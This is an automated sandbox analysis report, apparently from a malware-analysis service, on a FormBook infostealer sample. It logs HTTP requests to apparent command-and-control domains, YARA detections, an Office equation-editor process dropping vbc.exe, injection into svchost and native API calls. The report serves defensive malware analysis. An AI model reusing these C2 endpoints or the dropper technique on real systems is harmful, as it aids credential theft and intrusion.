Source: global traffic HTTP traffic detected: GET /scb0/?Fd=9/BqtxNO8SZEigUgjw/jJ2i6+zR3ejBZmh2LifaRE3cbasx521HSBMlSKzI9uLCsk85EYQ==&w6AxuD=NpI8gJ HTTP/1.1Host: www.floridawp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=L8pgukv0AuVDNAdjNh2AJGutMHnCfg3bCrFlNw+YyifAdhr3mrIeLuq3PR+hiDkJiRhf3g==&w6AxuD=NpI8gJ HTTP/1.1Host: www.viscoent.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /scb0/?Fd=BfSM6E5FO5mfZBpeeQrV1vQh+D95EOiFfI1FDjk8ynIPzfiNz31eNoHs9fDCzXb1/NDphw==&w6AxuD=NpI8gJ HTTP/1.1Host: www.meta-bot.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
.NET source code contains very large strings
Source: vbc[1].exe.4.dr, FlowPanelManager.cs Long String: Length: 34816
Source: vbc.exe.4.dr, FlowPanelManager.cs Long String: Length: 34816
Source: 6.2.vbc.exe.2a0000.0.unpack, FlowPanelManager.cs Long String: Length: 34816
Source: 6.0.vbc.exe.2a0000.0.unpack, FlowPanelManager.cs Long String: Length: 34816
Source: 7.2.vbc.exe.2a0000.1.unpack, FlowPanelManager.cs Long String: Length: 34816
Yara signature match
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_002A695C 6_2_002A695C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00341380 6_2_00341380
Source: C:\Users\Public\vbc.exe Code function: 6_2_003416E8 6_2_003416E8
Source: C:\Users\Public\vbc.exe Code function: 6_2_00343C40 6_2_00343C40
Source: C:\Users\Public\vbc.exe Code function: 6_2_0034A6D3 6_2_0034A6D3
Source: C:\Users\Public\vbc.exe Code function: 6_2_0034971F 6_2_0034971F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003437E1 6_2_003437E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_00344AF0 6_2_00344AF0
Source: C:\Users\Public\vbc.exe Code function: 6_2_00343C3D 6_2_00343C3D
Source: C:\Users\Public\vbc.exe Code function: 6_2_00540C6F 6_2_00540C6F
Source: C:\Users\Public\vbc.exe Code function: 6_2_005400A0 6_2_005400A0
Source: C:\Users\Public\vbc.exe Code function: 7_2_002A695C 7_2_002A695C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B8DD 7_2_0041B8DD
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C14C 7_2_0041C14C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C6C 7_2_00408C6C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C70 7_2_00408C70
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CE9E 7_2_0041CE9E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B9E0C6 7_2_00B9E0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BCD005 7_2_00BCD005
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BB905A 7_2_00BB905A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA3040 7_2_00BA3040
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B9E2E9 7_2_00B9E2E9
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C41238 7_2_00C41238
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC63DB 7_2_00BC63DB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B9F3CF 7_2_00B9F3CF
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA2305 7_2_00BA2305
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BEA37B 7_2_00BEA37B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA7353 7_2_00BA7353
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BB1489 7_2_00BB1489
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BD5485 7_2_00BD5485
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BDD47D 7_2_00BDD47D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BBC5F0 7_2_00BBC5F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA351F 7_2_00BA351F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA4680 7_2_00BA4680
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BAE6C1 7_2_00BAE6C1
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C42622 7_2_00C42622
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BAC7BC 7_2_00BAC7BC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C2579A 7_2_00C2579A
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BD57C3 7_2_00BD57C3
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C3F8EE 7_2_00C3F8EE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC286D 7_2_00BC286D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BAC85C 7_2_00BAC85C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA29B2 7_2_00BA29B2
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BB69FE 7_2_00BB69FE
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C4098E 7_2_00C4098E
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C25955 7_2_00C25955
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C53A83 7_2_00C53A83
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C2DBDA 7_2_00C2DBDA
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C4CBA4 7_2_00C4CBA4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B9FBD7 7_2_00B9FBD7
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BC7B00 7_2_00BC7B00
Source: C:\Users\Public\vbc.exe Code function: 7_2_00C3FDDD 7_2_00C3FDDD
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BD0D3B 7_2_00BD0D3B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BACD5B 7_2_00BACD5B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BD2E2F 7_2_00BD2E2F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BBEE4C 7_2_00BBEE4C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BB0F3F 7_2_00BB0F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0092E0C6 9_2_0092E0C6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0095D005 9_2_0095D005
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0094905A 9_2_0094905A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00933040 9_2_00933040
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0092E2E9 9_2_0092E2E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009D1238 9_2_009D1238
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009563DB 9_2_009563DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0092F3CF 9_2_0092F3CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00932305 9_2_00932305
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00937353 9_2_00937353
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0097A37B 9_2_0097A37B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00965485 9_2_00965485
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00941489 9_2_00941489
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0094C5F0 9_2_0094C5F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0093351F 9_2_0093351F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00934680 9_2_00934680
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0093E6C1 9_2_0093E6C1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009D2622 9_2_009D2622
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009B579A 9_2_009B579A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0093C7BC 9_2_0093C7BC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009657C3 9_2_009657C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009CF8EE 9_2_009CF8EE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0093C85C 9_2_0093C85C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0095286D 9_2_0095286D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009D098E 9_2_009D098E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009329B2 9_2_009329B2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009469FE 9_2_009469FE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009B5955 9_2_009B5955
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009E3A83 9_2_009E3A83
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009DCBA4 9_2_009DCBA4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009BDBDA 9_2_009BDBDA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0092FBD7 9_2_0092FBD7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00957B00 9_2_00957B00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009CFDDD 9_2_009CFDDD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00960D3B 9_2_00960D3B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0093CD5B 9_2_0093CD5B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00962E2F 9_2_00962E2F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0094EE4C 9_2_0094EE4C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00940F3F 9_2_00940F3F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0095DF7C 9_2_0095DF7C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009C14C 9_2_0009C14C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009D330 9_2_0009D330
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B8DD 9_2_0009B8DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00088C6C 9_2_00088C6C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00088C70 9_2_00088C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082D90 9_2_00082D90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009CE9E 9_2_0009CE9E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00082FB0 9_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0099F970 appears 81 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 00973F92 appears 108 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0097373B appears 238 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0092E2A8 appears 38 times
Source: C:\Windows\SysWOW64\svchost.exe Code function: String function: 0092DF5C appears 106 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B9DF5C appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00B9E2A8 appears 37 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00BE3F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00BE373B appears 229 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00C0F970 appears 79 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004185B0 NtCreateFile, 7_2_004185B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418660 NtReadFile, 7_2_00418660
Source: C:\Users\Public\vbc.exe Code function: 7_2_004186E0 NtClose, 7_2_004186E0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418790 NtAllocateVirtualMemory, 7_2_00418790
Source: C:\Users\Public\vbc.exe Code function: 7_2_004185AA NtCreateFile, 7_2_004185AA
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041865A NtReadFile, 7_2_0041865A
Source: C:\Users\Public\vbc.exe Code function: 7_2_004186DF NtClose, 7_2_004186DF
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041878D NtAllocateVirtualMemory, 7_2_0041878D
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B900C4 NtCreateFile,LdrInitializeThunk, 7_2_00B900C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B90078 NtResumeThread,LdrInitializeThunk, 7_2_00B90078
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B90048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_00B90048
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B907AC NtCreateMutant,LdrInitializeThunk, 7_2_00B907AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8F9F0 NtClose,LdrInitializeThunk, 7_2_00B8F9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8F900 NtReadFile,LdrInitializeThunk, 7_2_00B8F900
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_00B8FAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_00B8FAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_00B8FBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_00B8FB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_00B8FC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_00B8FC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FD8C NtDelayExecution,LdrInitializeThunk, 7_2_00B8FD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_00B8FDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_00B8FEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_00B8FED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FFB4 NtCreateSection,LdrInitializeThunk, 7_2_00B8FFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B910D0 NtOpenProcessToken, 7_2_00B910D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B90060 NtQuerySection, 7_2_00B90060
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B901D4 NtSetValueKey, 7_2_00B901D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B9010C NtOpenDirectoryObject, 7_2_00B9010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B91148 NtOpenThread, 7_2_00B91148
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8F8CC NtWaitForSingleObject, 7_2_00B8F8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8F938 NtWriteFile, 7_2_00B8F938
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B91930 NtSetContextThread, 7_2_00B91930
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FAB8 NtQueryValueKey, 7_2_00B8FAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FA20 NtQueryInformationFile, 7_2_00B8FA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FA50 NtEnumerateValueKey, 7_2_00B8FA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FBE8 NtQueryVirtualMemory, 7_2_00B8FBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FB50 NtCreateKey, 7_2_00B8FB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FC30 NtOpenProcess, 7_2_00B8FC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FC48 NtSetInformationFile, 7_2_00B8FC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B90C40 NtGetContextThread, 7_2_00B90C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B91D80 NtSuspendThread, 7_2_00B91D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FD5C NtEnumerateKey, 7_2_00B8FD5C
